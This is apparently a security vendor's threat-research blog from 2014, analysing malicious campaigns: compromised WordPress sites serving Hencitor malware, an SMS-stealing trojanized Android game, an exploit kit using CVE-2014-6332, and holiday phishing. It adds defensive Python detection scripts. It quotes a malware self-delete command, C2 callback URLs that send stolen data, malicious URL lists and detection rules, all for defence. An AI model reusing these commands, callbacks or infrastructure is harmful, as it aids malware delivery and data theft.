Sunday, December 21, 2014

Compromised WordPress sites serving multiple malware payloads

During our daily log monitoring process, we observe many interesting threat events. One such event led us to a compromised WordPress site campaign, which was found to serve multiple malware families including Upatre, Hencitor, Extrat/Xtreme RAT and Vawtrak. The URLs serving the malware followed a particular pattern: every infected WordPress site we observed used a URL containing "/1.php?r". Emerging Threats (ET) had previously released a Snort signature for this campaign on 12/08/2014, and we have been continuously monitoring activity related to it since then. The following is the Snort signature released by ET.
 
Snort Signature
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Probable malicious download from e-mail link /1.php";
  flow:established,to_server; urilen:8; content:"/1.php?r"; http_uri;
  content:!"Referer|3a 20|"; http_header;
  flowbits:set,et.exploitkitlanding; classtype:bad-unknown; sid:2019894; rev:1;)
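As an added illustration (my own example, not code from the post or from ET), here is the same detection logic applied to web-proxy logs in Python. One caveat worth noting about the rule as written: urilen:8 means the request URI must be exactly eight bytes, so the rule only fires on a root-level /1.php?r. The deeper paths in the list below, such as /wp-admin/1.php?r, would not trip it. The script therefore reports a strict reading of the rule alongside a relaxed one that accepts any path ending in /1.php?r. The log lines and hostnames are constructed.

```python
from urllib.parse import urlsplit

# Constructed proxy log lines (not from the original post).
# Fields: method, URL, Referer ("-" means the header was absent).
SAMPLE_LOG = """\
GET http://site-a.invalid/1.php?r -
GET http://site-b.invalid/wp-admin/1.php?r -
GET http://site-c.invalid/1.php?r http://site-c.invalid/
GET http://site-d.invalid/1.php?r=1 -
GET http://site-e.invalid/index.php -
"""

SIGNATURE_CONTENT = "/1.php?r"   # the content: match from the ET rule
SIGNATURE_URILEN = 8             # urilen:8 from the ET rule


def request_uri(url):
    """Return path plus query string, the part of the request Snort's http_uri buffer covers."""
    parts = urlsplit(url)
    uri = parts.path or "/"
    if parts.query:
        uri += "?" + parts.query
    return uri


def matches_strict(uri, referer):
    """Literal reading of the rule: URI exactly 8 bytes, contains /1.php?r, no Referer header."""
    return (len(uri) == SIGNATURE_URILEN
            and SIGNATURE_CONTENT in uri
            and referer == "-")


def matches_relaxed(uri, referer):
    """Relaxed variant: any path ending in /1.php?r (e.g. /wp-admin/1.php?r), still with no Referer."""
    return uri.endswith(SIGNATURE_CONTENT) and referer == "-"


def scan(log_text):
    """Return (url, verdict) for each request that matches either reading of the rule."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _method, url, referer = line.split()
        uri = request_uri(url)
        if matches_strict(uri, referer):
            hits.append((url, "strict"))
        elif matches_relaxed(uri, referer):
            hits.append((url, "relaxed"))
    return hits


if __name__ == "__main__":
    for url, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:8} {url}")
```

Note that the request with a Referer header is skipped by both readings, matching the rule's intent of catching direct clicks from e-mail links, and that /1.php?r=1 is not matched by either because neither its length nor its ending fits.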

Below are the compromised websites observed, which have been found to be serving multiple malware families.

Compromised WordPress websites
airlessspraysupplies[.]com/wp-includes/1[.]php?r
altero[.]be/1[.]php?r
alzina[.]cat/1[.]php?r
angeladoesfood[.]com/wp-admin/1[.]php?r
apsmiles[.]com/wp-content/themes/rfx/1[.]php?r
architecture[.]web[.]auth[.]gr/1[.]php?r
augustgifford[.]com/wp-admin/1[.]php?r
bankruptcy-software[.]com/wp-content/themes/classic/1[.]php?r
bernie[.]jshall[.]net/wp-content/themes/twentytwelve/1[.]php?r
beta[.]pescariusports[.]ro/images/1[.]php?r
blackwellanddenton[.]com/components/com_contact/1[.]php?r
blog[.]longboardsicecream[.]com/wp-content/plugins/1[.]php?r
blog[.]ridici-jednotky[.]cz/wp-content/plugins/simple4us/1[.]php?r
blog[.]topdealslondon[.]com/wp-content/uploads/1[.]php?r
cartorioalbuquerque[.]com[.]br/images/1[.]php?r
climatechange[.]mobi/images/1[.]php?r
core[.]is/1[.]php?r
couponshare[.]me/1[.]php?r
dannygill[.]co[.]uk/wp-content/plugins/simple4us/1[.]php?r
dlaciebie[.]org/wp-admin/1[.]php?r
geototal[.]az/en/ru/engine/editor/scripts/common/codemirror/mode/xml/1[.]php?r
kba1f9684c70[.]nazwa[.]pl/images/1[.]php?r
linkleads[.]vn/1[.]php?r
lionel[.]my/wp-content/plugins/akismet/1[.]php?r
livedoor[.]eu/1[.]php?r
ludovicharollais[.]org/wp-admin/1[.]php?r
m11[.]mobi/images/1[.]php?r
matthewkarant[.]com/wp-content/themes/twentynine/1[.]php?r
mcymbethel[.]com[.]ar/modules/mod_ariimageslider/1[.]php?r
merklab[.]eu/1[.]php?r
mitoyotaseagarrota[.]com/components/com_banners/1[.]php?r
mlmassagetherapy[.]com[.]au/wp-content/uploads/1[.]php?r
monitoring[.]sensomedia[.]hu/1[.]php?r
newwww[.]r11mis[.]be/images/1[.]php?r
odelia-coaching[.]co[.]il/wp-content/plugins/google-sitemap-generator/1[.]php?r
osp[.]ruszow[.]liu[.]pl/images/1[.]php?r
pms[.]isovn[.]net/images/1[.]php?r
prodvizhenie-sajta[.]com/images/1[.]php?r
redmine[.]sensomedia[.]hu/1[.]php?r
salihajszalon[.]hu/1[.]php?r
sonicboommusic[.]com[.]au/components/com_banners/1[.]php?r
sparkledesign[.]ro/1[.]php?r
thebestcookbooks[.]co[.]uk/wp-content/plugins/1[.]php?r
thefoodstudio[.]co[.]nz/wp-content/themes/food-cook/1[.]php?r
thietkekientruca4[.]vn/1[.]php?r
treasurething[.]com/wp-includes/pomo/1[.]php?r
tsv-penzberg[.]de/wp-admin/1[.]php?r
turbomarketingteam[.]com/1[.]php?r
tusengangerstarkare[.]ingelaclarin[.]se/wp-admin/1[.]php?r
twobyones[.]com/1[.]php?r
xhmeiastokyma[.]gr/1[.]php?r
youreverlastingmemories[.]co[.]uk/1[.]php?r

These compromised WordPress sites may have been used by Exploit Kit (EK) authors as drop sites for serving malware. Another potential attack vector could involve email spam.
The following table shows the different types of malware we have seen dropped from the aforementioned compromised sites. All of the malware was delivered in ZIP archives.
 
ZIP MD5                           | ZIP FILE NAME
2f225283c66032c9f7dcb44f42697246  | fax_20141204_385.pdf.zip
6696527bfda97b1473d1047117ded8d6  | invoice.pdf.zip
93babef06bfd93bcbb5065c445fb57d4  | label_08122014_23.pdf.zip
bea9be813bb7df579d5be3e4543dc6a4  | payment_details9427923.pdf.zip
1159fe7ec4d0b2cfde57dfb28b98f0c9  | ePackage_12092014_42.pdf.zip
038710b2029046c39ca4082e2c34f9b3  | wav_voice20141208.zip
ec35acdbe331c73e5e6883ebc08f896d  | payment_invoice_182734.pdf.zip
8f00cfdf067b01462670212ba5874cdb  | pdf_efax_9823612397.zip

Let's take a look at the files after unzipping them. All of the files are Windows screen savers (.scr executables) carrying fake icons that mimic legitimate software packages, to persuade victims to click on them.
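A small triage script for archives like the ones in the table, added here as an example of my own rather than anything from the post: it hashes the ZIP, checks the hash against the MD5s listed above, and then inspects each member for the two tells described here, a document extension in front of an executable one (invoice.pdf.scr) and an "MZ" header marking a Windows executable. The sample archive is constructed in memory with a harmless stub, not a real sample.

```python
import hashlib
import io
import zipfile

# ZIP MD5s and file names from the table above (values as given in the post).
KNOWN_CAMPAIGN_ZIPS = {
    "2f225283c66032c9f7dcb44f42697246": "fax_20141204_385.pdf.zip",
    "6696527bfda97b1473d1047117ded8d6": "invoice.pdf.zip",
    "93babef06bfd93bcbb5065c445fb57d4": "label_08122014_23.pdf.zip",
    "bea9be813bb7df579d5be3e4543dc6a4": "payment_details9427923.pdf.zip",
    "1159fe7ec4d0b2cfde57dfb28b98f0c9": "ePackage_12092014_42.pdf.zip",
    "038710b2029046c39ca4082e2c34f9b3": "wav_voice20141208.zip",
    "ec35acdbe331c73e5e6883ebc08f896d": "payment_invoice_182734.pdf.zip",
    "8f00cfdf067b01462670212ba5874cdb": "pdf_efax_9823612397.zip",
}

DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".wav")
EXECUTABLE_EXTS = (".scr", ".exe", ".com", ".pif", ".bat", ".cmd")


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def deceptive_extension(name):
    """True for names like invoice.pdf.scr: an executable extension hidden behind a document one."""
    lower = name.lower()
    if not lower.endswith(EXECUTABLE_EXTS):
        return False
    stem = lower.rsplit(".", 1)[0]
    return stem.endswith(DOCUMENT_EXTS)


def triage_zip(zip_bytes):
    """Hash the archive, check it against the campaign table, and inspect every member."""
    zip_md5 = md5_hex(zip_bytes)
    report = {
        "zip_md5": zip_md5,
        "known_campaign_zip": zip_md5 in KNOWN_CAMPAIGN_ZIPS,
        "members": [],
    }
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            report["members"].append({
                "name": info.filename,
                "md5": md5_hex(data),
                "deceptive_extension": deceptive_extension(info.filename),
                "pe_header": data[:2] == b"MZ",   # Windows .exe/.scr files start with "MZ"
            })
    report["suspicious"] = any(m["deceptive_extension"] or m["pe_header"] for m in report["members"])
    return report


def build_sample_zip():
    """Constructed stand-in for a campaign archive: a .pdf.scr member whose bytes start with an MZ stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payment_invoice_182734.pdf.scr",
                    b"MZ" + b"\x00" * 62 + b"constructed stub, not a real PE")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip(build_sample_zip()))
```

The constructed archive will of course not match any MD5 in the table; the point of the hash check is that a real sample pulled from mail quarantine can be matched against the list without being extracted first, while the member checks catch re-packed variants whose ZIP hash has changed.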

Downloaded files:


For this post we've chosen to focus on the Hencitor malware. Hencitor’s typical behavior is to download additional malware onto the victim’s machine and execute it. 

MD5: 6bb3b23ff3e736d499775120aa8d6ae2
VT Score: 9/56 (At the time of analysis)

Let's take a look at some important things noted while conducting dynamic analysis of this malware.
  • Copies itself to
    • "C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe"
  • Creates an autostart registry key entry
    • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
      • "winlogin" = "C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe"
  • Uses ping.exe to check the status of other devices and networks. In the command line below, the ten pings to localhost also serve as a delay before the original dropper is deleted and the installed copy is started.
    • cmd /D /R ping -n 10 localhost && del C:\payment_invoice_182734.pdf.scr.exe && start /B C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe && exit
  • Creates a thread in the following existing processes on the system:
    • C:\Windows\explorer.exe
    • C:\Windows\System32\sppsvc.exe
    • C:\Windows\System32\wbem\WmiPrvSE.exe
    • C:\Windows\System32\conhost.exe
  • Deletes itself after installation
    • c:\payment_invoice_182734.pdf.scr.exe
  • The malware was seen resolving a couple of suspicious Tor2web gateway hostnames:
    • o3qz25zwu4or5mak.tor2web[.]org
    • o3qz25zwu4or5mak.tor2web[.]ru
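The behaviours above translate directly into endpoint hunting logic. The following is an added example of mine (not from the post) that runs three checks over constructed telemetry shaped loosely like Sysmon process-creation, registry-set and DNS-query events: a "ping -n N localhost && del" self-delete chain, a Run-key value pointing into a user profile directory, and resolution of a tor2web gateway. The event records are made up; the command line, registry key and hostnames in the first three reproduce the indicators listed above.

```python
import re

# Constructed telemetry events (not from the post). The first three reproduce the
# indicators listed above; the remaining three are benign noise for contrast.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /D /R ping -n 10 localhost && del C:\payment_invoice_182734.pdf.scr.exe "
                r"&& start /B C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe && exit"},
    {"type": "registry",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run",
     "value": "winlogin", "data": r"C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe"},
    {"type": "dns", "query": "o3qz25zwu4or5mak.tor2web.org"},
    {"type": "process", "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping -n 1 fileserver.corp.invalid"},
    {"type": "registry",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "VendorUpdater", "data": r"C:\Program Files\Vendor\updater.exe"},
    {"type": "dns", "query": "www.example.com"},
]

# Autostart key (either native or Wow6432Node view) whose value points into AppData.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run$", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Roaming|Local)\\", re.IGNORECASE)
# ping-to-localhost used as a sleep, immediately followed by deletion of a file.
PING_SELF_DELETE_RE = re.compile(r"ping\s+-n\s+\d+\s+localhost\s*&&\s*del\s", re.IGNORECASE)
# Any hostname routed through a tor2web gateway domain.
TOR2WEB_RE = re.compile(r"\.tor2web\.", re.IGNORECASE)


def classify(event):
    """Return a finding label for a single event, or None when nothing matches."""
    kind = event["type"]
    if kind == "process" and PING_SELF_DELETE_RE.search(event["cmdline"]):
        return "ping-delay self-delete chain"
    if kind == "registry" and RUN_KEY_RE.search(event["key"]) and USER_WRITABLE_RE.search(event["data"]):
        return "Run-key autostart pointing into a user profile directory"
    if kind == "dns" and TOR2WEB_RE.search(event["query"]):
        return "resolution of a tor2web gateway"
    return None


def hunt(events):
    """Return (index, finding) pairs for every event that matches one of the behaviours."""
    results = []
    for i, event in enumerate(events):
        finding = classify(event)
        if finding:
            results.append((i, finding))
    return results


if __name__ == "__main__":
    for i, finding in hunt(EVENTS):
        print(f"event {i}: {finding}")
```

The Run-key check deliberately ignores the value name, since "winlogin" is trivially changed between builds, and keys on the more durable trait that a system-wide autostart entry launches something from a user-writable profile path.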
Conclusion:
Compromising vulnerable WordPress sites to spread malware has become one of the more widely used attack vectors for EKs and email spam campaigns. Such campaigns generally drop variants of well-known malware families that go undetected by AV vendors; at the time of analysis we observed poor detection rates for the malware samples involved in this campaign.

-Stay Safe

Top Security Features Added to Android Lollipop

As Google officially rolls out its new operating system, Lollipop, let's review some of the enhanced security features added to Android 5.0.

Kill switch
The most interesting new security feature is the Factory Reset Protection option, which is also known as the “kill switch.” To aid corporate and personal users dealing with stolen devices, the personal data stored within the device can now be remotely wiped and the phone made inoperable. With reports suggesting that over 3 million Americans had their smart phones stolen last year, it's easy to see why Google has added this feature to Lollipop.
Encryption on the fly
Another valuable security feature available in Lollipop is default encryption. This is not an entirely new feature, as previous Android versions did offer encryption, but it had to be explicitly enabled by the user. With Lollipop, the initial boot prompts users to activate encryption; thereafter, new data is encrypted on the fly.

Improved malware protection and sandboxing
Lollipop is armed with SELinux (Security Enhanced Linux), which aims to provide enhanced protection against malware and vulnerabilities. This feature ensures secure app isolation, which helps to keep private data secure should the device be compromised. 

Smart Device Lock
The real privacy danger for most users is simply leaving a device unlocked and then having someone else gain access to personal data and open social profiles. Locking phone features should not be a tedious task that users avoid. Lollipop therefore introduces a new feature called Smart Lock to help combat this problem.

Smart Lock adds the ability to set trusted locations such as home or the office, where your device will open automatically once you enter that region. You can do the same in conjunction with specific Bluetooth and NFC enabled Android Wear smart watches. When sensing these trusted devices, Lollipop phones/tablets will lower their security shields as the owner is presumably present. Users are also able to set notification access prior to a security lock to allow actions such as sending a message.

Multiple User Profiles
As Internet social profiles and personal data like photos and contacts are generally the most sensitive information for a user, lending a phone to another person creates a security risk. Lollipop solves this issue by permitting multiple user profiles. Users can create a different guest profile which has limited access. The Owner account has access to the entire device and everything within it, as well as control over other profiles on the device. A User account, on the other hand, has limited access to certain apps and content controlled by the device’s main user, as well as limited calling and SMS capabilities. This feature is also beneficial for parents who can give their phone to their kids and only grant them access to a specific app or a game that they want them to play and nothing else on the device.

Want to scan Android apps for security and privacy issues? Try ZAP.

Thursday, December 11, 2014

Trojanized and Pirated Assassins Creed app

During our daily research, we recently came across Android malware disguising itself as an Assassins Creed app, a popular paid gaming application. The malware in question installs a pirated version of the Assassins Creed game that functions normally, leaving the end user oblivious to the malicious activities it performs in the background.

Application information:

Permissions:
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.GET_ACCOUNTS
  • android.permission.INTERNET
  • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_SMS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.WRITE_SMS
The malicious application is capable of sending multi-part text messages, harvesting text messages from a victim's device, and sending stolen information to a remote Command & Control (C2) server. We were able to locate phone numbers belonging to Russian bank "Volga-Vyatka Bank of Sberbank of Russia" in the malicious application code for which SMS messages are being intercepted to steal sensitive information. Another interesting feature we saw is the usage of AES encryption for all the C2 communication. It also harvests the mobile number and Subscriber ID information from the victim device for tracking purposes.
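The permission list alone already tells most of this story. As an added example (my own code, not the sample's and not from the post), the script below parses a constructed AndroidManifest.xml declaring exactly the permissions listed above and maps the combinations to the capabilities described in this paragraph: SMS interception plus network access for exfiltration, SMS sending, identity harvesting and boot persistence, with an extra finding when SMS permissions turn up in an app that claims to be a game. The manifest text and the category label are assumptions for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed AndroidManifest.xml (not extracted from the sample) declaring the permissions listed above.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.constructed.game">
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <application android:label="Constructed Game"/>
</manifest>
"""

P = "android.permission."
SMS_PERMS = {P + "READ_SMS", P + "RECEIVE_SMS", P + "SEND_SMS", P + "WRITE_SMS"}
IDENTITY_PERMS = {P + "READ_PHONE_STATE", P + "GET_ACCOUNTS"}


def declared_permissions(manifest_xml):
    """Collect the android:name attribute of every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}


def assess(perms, expected_category="game"):
    """Map permission combinations to the capabilities they grant; returns a list of findings."""
    findings = []
    if perms & {P + "RECEIVE_SMS", P + "READ_SMS"} and P + "INTERNET" in perms:
        findings.append("can intercept/read SMS and has network access: SMS exfiltration possible")
    if P + "SEND_SMS" in perms:
        findings.append("can send SMS, including multi-part messages")
    if P + "WRITE_SMS" in perms:
        findings.append("can alter or delete stored SMS")
    if perms & IDENTITY_PERMS:
        findings.append("reads phone/subscriber identity (device tracking)")
    if P + "RECEIVE_BOOT_COMPLETED" in perms:
        findings.append("restarts at boot (persistence)")
    if expected_category == "game" and perms & SMS_PERMS:
        findings.append("SMS permissions have no plausible use in a game")
    return findings


if __name__ == "__main__":
    for finding in assess(declared_permissions(SAMPLE_MANIFEST)):
        print("-", finding)
```

Permission triage like this is a first pass only: a legitimate messaging app would clear most of these checks, which is why the last finding keys on the mismatch between what the app claims to be and what it asks for.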

The screenshot below shows the AES crypto library configurations. All the sensitive harvested data and C2 communication is encrypted and decrypted using this configuration.



Code snippet showing the string containing the Russian Bank phone numbers:



Command and Control server information in encrypted and decrypted form:



We saw the following two command and control servers hardcoded in the malicious application:
  •  bnk7ihekqxp.net
  •  googleapiserver.net


The screenshot above shows the usage of AES for C2 communication. A sample call back request from the infected device will be of the following format:

"http://bnk7ihekqxp[.]net/iaefu.php?1=4fe08eb4b43XXXXXXXX&id=X".

The code snippet below shows the SMS and Subscriber ID information harvesting feature:


It sends the harvested information via a POST request as seen below:


Code snippet showing the SMS sending feature:


Code snippet showing the SMS interception and storage arrays:

The intercepted SMS data, Subscriber ID, and phone number information are then sent to the C2 server in encrypted form.

Here is a sample request:
http://googleapiserver.net/kysnfhwo.php?1=4fe08eXXXXXXXXXXXXXXXXXXXX&4=3XXXXXXXXXXXXXXX

The malicious app performs the activity of harvesting sensitive information and sending it to the remote server on a regular interval by setting up an alarm as seen below:


Upon installation, the user will see the game icon on the screen, which disappears shortly thereafter while the malicious process keeps running in the background.

Recommendation:

Cybercriminals often lure users with pirated versions of popular paid mobile applications that have been Trojanized to steal sensitive information. We strongly recommend that users stay away from such offers and download mobile apps only from trusted sources such as the Google Play store.

Wednesday, November 26, 2014

Defaced websites leading to Dokta Chef Exploit Kit and CVE-2014-6332

Defacing websites has been the mainstay of hacktivist groups for spreading their message. During recent research, we found multiple compromised websites containing a malicious link to a "lulz.htm" page, which in turn leads the user to a Dokta Chef Exploit Kit (EK) hosting site. This appears to be a new tactic whereby a hacktivist group has escalated its activities by attacking users who visit the defaced sites. This is out of character for such groups, which generally seem more interested in disrupting private sector compliance with government entities than in targeting end users.


The contact information provided on the defacement page shows that the culprits of this attack are claiming to be part of the "AnonGhostTeam" group, based on the associated Twitter account.  This group has targeted numerous Government and Mass Media websites in the past including:
  • swo.gov.sy
  • syrianpost.gov.sy
  • myisrael.org.il
  • madagascar.gov.mg
  • skynewsinternational.com
  • ccvs.state.vt.us
  • txep.uscourts.gov
  • rsb.wp.mil.pl
  • navy.gov.au
  • igc.mowr.gov.iq
  • embavenez.co.uk
  • libyanembassy-italy.gov.ly
The defaced pages have been lifted in most cases, leaving only a Zone-H mirror.


Written in Beautiful Comic Sans
The defaced websites were found to be hosting a page called "lulz.htm", which contains highly obfuscated JavaScript code leading users into a Dokta Chef EK infection cycle.

Obfuscated JavaScript on the compromised sites

CVE-2014-6332 exploit

The Dokta Chef EK was serving a malicious payload for a recently disclosed Microsoft vulnerability, CVE-2014-6332, which causes remote code execution when the user visits a specially crafted web page using Internet Explorer (IE). The vulnerability is triggered when IE improperly accesses Object Linking and Embedding (OLE) objects in memory. The vulnerable code has been present in the OleAut32 library since IE version 3.0 and was recently fixed in MS14-064.


The attacker is targeting only 32-bit Windows operating systems and also ensures that the user's browser is IE, as seen in the exploit code snippet above. The exploit cycle will terminate if any of the following conditions are true:
  • User is browsing from a 64-bit Windows operating system
  • User is browsing from a non-Windows operating system
  • User's browser is not IE


If the IE version used by the victim is lower than 4, the runshellcode() routine will be invoked, skipping the CVE-2014-6332 exploit cycle.  If the version used is higher than 3, setnotsafemode() routine is invoked to exploit the CVE-2014-6332 vulnerability.


The CVE-2014-6332 vulnerability is triggered by using an abnormally large array in conjunction with ReDim Preserve, as shown in the VBScript exploit code snippet above.

At the time of research, the end payload was not reachable, but the VirusTotal Scan of the hostname shows a history of dubious activity.

The Zscaler ThreatLabZ team has deployed multiple protections against this threat and is actively monitoring the malicious activity surrounding this mass compromise.

Tuesday, November 25, 2014

Beware of Phishing Attacks and Other Scams during the Thanksgiving Shopping Season



Thanksgiving Day is one of the major holidays celebrated in the United States on the fourth Thursday in November. The following Friday, referred to as Black Friday, marks the start of the Christmas holiday shopping season. Almost every retailer large and small offers huge discounts on Black Friday, often extending through the weekend and the following Monday, now known as Cyber Monday.


As we near Thanksgiving and the start of the holiday shopping frenzy, we’re observing a sharp increase in cyber scams and phishing activities targeting online shoppers. As shoppers look for the best deals available, cybercriminals are quick to take advantage of unsuspecting users.

Increase in online shopping transactions

Every year during this timeframe, we observe a noticeable spike in the total number of web transactions within the Shopping category. We have shared this trend in our previous blogs as well ([1],[2]).

Last year, we saw around 2.71% of all the web transactions categorized as Shopping and this year is no different. We currently see that 2.63% of total web transactions belong to the Shopping category and we expect this number to rise as we approach the end of the month. The following chart shows that the number of Shopping transactions has increased steadily throughout November.


Cyber Scams and Phishing attacks

The increase in Shopping activity comes with an unwelcome increase in phishing attempts. Phishing is a well known attack method, often used by attackers to steal sensitive information like authentication credentials, credit card numbers and personal information. We have already seen a large spike in Phishing and Spam activity, specifically targeting Thanksgiving, Black Friday, and Cyber Monday events. The following graph shows the phishing transactions for this month that have been blocked by Zscaler:

We caution consumers to be extra vigilant this holiday season when shopping online. Here are some examples of phishing attempts that we have blocked:

Walmart phishing attempt:



Amazon phishing attempt:

Ebay phishing attempt:


The motive behind these attempts is to steal sensitive user information which includes personal credentials and financial data. Cybercriminals often use this stolen information for illicit activities resulting in monetary gain.

More phishing sites targeting online retailers:
  • Ebay - hxxp://124[.]150[.]140[.]133/~ritenfad/viewitem/dll/88322933932/
  • Walmart - hxxp://ofertaswalmart[.]besaba.com
  • Walmart - hxxp://walmartfriday[.]net/
  • Amazon - hxxp://zekocase[.]com/._ama_c0nf1rm/info_bill/login.php
  • Amazon - 213[.]13[.]119[.]152/am/

Fake Black Friday/Cyber Monday/Thanksgiving related sites:
  • hxxp://sfspr[.]org/?hid=hollister-cyber-monday-cyber-monday-sale
  • hxxp://cyber-shop[.]net
  • hxxp://www[.]ocdiagnostics[.]net/?id=louboutin-loafers-cyber-monday-deals
  • hxxp://koeriersdienstdemolen[.]nl/wp-content/languages/?page=toms-soap-cyber-monday-2014
  • hxxp://devillevacaville[.]com/?tid=cyber-monday-toms-canada
  • hxxp://postyourads.co[.]uk/?mid=mulberry-bags-cyber-monday-deals
  • hxxp://semexcesso.com[.]br/?hid=hollister-girls-cyber-monday-2014
  • hxxp://dl5.iq11download[.]com/lm/lmdisc2/thanksgivingss.exe
  • hxxp://www[.]americanasblackfriday[.]esy[.]es
  • hxxp://www[.]systempackaging[.]com/images/ugg/black-friday-uggs-p-35.html
  • hxxp://busycatholicmoms[.]com/2013/11/26/new-articles-and-happy-thanksgiving/
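The two lists above share a few structural tells that can be checked automatically before a user ever clicks: a retailer's name sitting in a hostname or path whose registrable domain is not the retailer's, a raw IP address standing in for a shop, and seasonal "black-friday"/"cyber-monday" keywords bolted onto unrelated domains. The script below is an added example of my own, not from the post, that runs those checks over a handful of the defanged URLs quoted above plus one legitimate control. The brand-to-domain allow-list and the short public-suffix table are assumptions for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Brands named in the lists above and the domains they legitimately use (assumed allow-list).
BRAND_DOMAINS = {"walmart": {"walmart.com"}, "amazon": {"amazon.com"}, "ebay": {"ebay.com"}}
LEGIT_DOMAINS = set().union(*BRAND_DOMAINS.values())
SEASONAL_KEYWORDS = ("black-friday", "blackfriday", "cyber-monday", "thanksgiving")
# Tiny stand-in for the Public Suffix List; a production tool should use the real one.
TWO_LEVEL_SUFFIXES = {"co.uk", "com.br", "com.au", "co.il", "co.nz"}


def refang(url):
    """Turn the defanged hxxp:// and [.] notation used above back into a parseable URL."""
    url = url.replace("hxxp", "http").replace("[.]", ".")
    return url if "://" in url else "http://" + url


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def registrable_domain(host):
    """Last two labels, or three when the suffix itself is two labels (e.g. postyourads.co.uk)."""
    labels = host.lower().split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def check(url):
    """Return a list of findings for one URL; an empty list means nothing looked off."""
    parts = urlsplit(refang(url))
    host = parts.hostname or ""
    findings = []
    if is_ip(host):
        findings.append("raw IP address instead of a retailer hostname")
        reg = None
    else:
        reg = registrable_domain(host)
    text = (host + parts.path + "?" + parts.query).lower()
    for brand, legit in BRAND_DOMAINS.items():
        if brand in text and reg not in legit:
            findings.append(f"'{brand}' in the URL but the registrable domain is {reg or host}")
    if any(k in text for k in SEASONAL_KEYWORDS) and reg not in LEGIT_DOMAINS:
        findings.append("holiday deal keyword on a domain that is not a known retailer")
    return findings


def scan(urls):
    return {url: check(url) for url in urls}


# URLs quoted from the lists above, plus one legitimate control.
SAMPLE_URLS = [
    "hxxp://walmartfriday[.]net/",
    "hxxp://ofertaswalmart[.]besaba.com",
    "hxxp://zekocase[.]com/._ama_c0nf1rm/info_bill/login.php",
    "213[.]13[.]119[.]152/am/",
    "hxxp://postyourads.co[.]uk/?mid=mulberry-bags-cyber-monday-deals",
    "https://www.walmart.com/",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE_URLS).items():
        print(url, "->", findings or "no findings")
```

Note the miss: the Amazon phishing page under zekocase[.]com spells the brand as "_ama_c0nf1rm" and sails through plain keyword matching, which is exactly why heuristics like these complement, rather than replace, block lists of known phishing URLs such as the ones above.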

Sample of subjects used in spam e-mail messages targeting online shoppers:

  • Get Stylish-furniture At Discount
  • Checkout tire sales for Black Friday
  • Make the Most of Black Friday, with A New smart-phone
  • Brand name laptops on sale for BlackFriday
  • [Black Friday Starts EARLY]Saveup to 90% +FREE BonusItems!
  • Walmart One Day Specials BlackFriday
  • Shop Black Friday sales to upgrade furniture
  • Thanksgiving Specials and BlackFriday Discounts!
  • New Early BlackFriday Door busters are Added EveryDay
  • Shop Black Friday to find discounts on electronics
  • Search major Savings on laptops...On black-friday
  • Limited Time Black Friday Deal
  • 10% off Site-Wide. Get Your Black Friday Shopping Started Today!
 
How can online shoppers protect themselves?

Thanksgiving marks the start of the holiday shopping season which continues until Christmas. The Zscaler ThreatLabZ team is working round the clock to ensure that our customers do not fall prey to such malicious activity.

We highly recommend that all online shoppers exercise extreme caution and follow our holiday season shopping security checklist:  

